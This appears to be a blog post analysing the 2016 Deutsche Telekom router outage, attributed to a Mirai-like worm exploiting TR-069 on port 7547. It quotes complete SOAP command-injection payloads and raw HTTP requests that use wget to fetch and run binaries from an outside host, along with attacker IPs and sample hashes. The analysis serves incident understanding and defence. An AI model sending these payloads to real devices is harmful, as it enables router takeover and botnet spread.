[Update]
This is a pretty nice description and summary: https://isc.sans.edu/forums/diary/Port+7547+SOAP+Remote+Code+Execution+Attack+Against+DSL+Modems/21759
The malware seems to be a descendant of the Mirai Linux worm
https://www.virustotal.com/en/file/7e84a8a74e93e567a6e7f781ab5764fe3bbc12c868b89e5c5c79924d5d5742e2/analysis/
which is described here
https://en.wikipedia.org/wiki/Mirai_(malware)
or here
https://www.incapsula.com/blog/malware-analysis-mirai-ddos-botnet.html
[/Update]
Many German Deutsche Telekom customers had connectivity problems tonight. Some people claimed that they could use their network again after changing the DNS server in their hosts. Most people got their boxes working again (for some time) after a reboot. Telekom communicated many misleading and conflicting information. Events are summarized here:
https://www.heise.de/newsticker/meldung/Grossstoerung-im-Telekom-Netz-3505820.html
I found some interesting facts here
https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz/Re-15-08-2014-Millionen-DSL-Router-durch-TR-069-Fernwartung-kompromittierbar/posting-29559291/show/
From everything I saw it seems that some attacker sends a TR 69 xml command like
<?xml version="1.0"?> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1> <NewNTPServer2/> <NewNTPServer3/> <NewNTPServer4/> <NewNTPServer5/> </u:SetNTPServers> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
I still try to get information if this comes from inside the Telekom network or the outside. The number of access requests is declining since tonight:
https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz/TR-069/posting-29558928/show/
It seems that Telekom now blocks Port 7547 tcp from the outside.
The URL seems to differ a bit. The server has IP
212.92.127.146 at the moment. People say it used to be 188.209.49.168.
(https://www.heise.de/forum/Netze/News-Kommentare/Grossstoerung-im-Telekom-Netz-dauert-an/Re-port-7547-scans-auf-Digitalisierungsbox/posting-29559739/show/).
Anyway, obviously this tries to inject some shell code via a bug first discovered here:
https://devicereversing.wordpress.com/2016/11/07/eirs-d1000-modem-is-wide-open-to-being-hacked/
First of all this changes the DNS server to some bullshit which explains the DNS problems… Second this loads a MIPS binary (SHA1:
60b0b1631b1c7112b34f6850f60fc62e95174428) into the ramdisk in /tmp and executes it. If the binary does not inject sth. permanently the show will be over after a reboot. So also this phenomenon is explained.
But now, what does the binary do? I just looked at the strings output and one thing is to disable the TR 69 port via
iptables -A INPUT -p tcp --destination-port 7547 -j DROP
and send some status information to a (for me) still unknown receiver:
POST / HTTP/1.1 Myname--is: Host: Cookie: http url=
There is at least a second version of the binary (sha1:
feb6531b4509015a3a119f67b290175b284e9864) that additionally disables a locally running telnet daemon and seems to replicate itself via 2 different URLs:
POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope> POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>
In one forum it was said that Telekom tries to use the same bug to inject an iptables command that closes the TR 69 port and hopes to be faster then the attackers. I’m still trying to get confirmation about this :).